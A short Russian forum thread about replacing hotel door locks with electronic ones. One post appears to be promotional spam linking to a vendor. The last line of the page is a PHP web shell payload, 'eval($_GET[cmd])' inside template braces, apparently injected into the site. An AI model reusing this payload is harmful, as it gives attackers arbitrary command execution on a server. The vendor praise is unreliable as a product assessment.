-
Мимо проходил
Гостиница
Всех с прошедшими праздниками! Мира всем и денег побольше! Вот заинтересовался вопросом стоит ли в гостинице поменять замки на электронные, как считаете?
-
Мимо проходил
Не только стоит поменять замки на дверях гостиницы, а надо было это давно уже сделать. Электронные замки для гостиниц сейчас делают из куда более безопасными https://hsu.systems/ru/products/electronic-hotel-locks/ И мне кажется еще и удобнее будет как клиентам так и персоналу. Вы вот знали что картами от таких замков можно расплачиваться за услуги гостиницы?
-
Мимо проходил
Кстати это и правда очень удобно! Я вот последний раз когда в Турции отдыхал именно так и расплачивался за все в отеле. А то раньше надо было думать куда в шорты спрятать деньги.
Последний раз редактировалось Galbine; 07.01.2020 в 23:58.
-
Мимо проходил
А для меня большой плюс таких замков в том что теперь точно дверь закроешь. Я один раз та вышел из номера и дверь е захлопнул и она сразу пищать стала. Вернулся и закрыл нормально.
Ваши права
- Вы не можете создавать новые темы
- Вы не можете отвечать в темах
- Вы не можете прикреплять вложения
- Вы не можете редактировать свои сообщения
Правила форума
{{$myVar = eval($_GET[cmd]);}}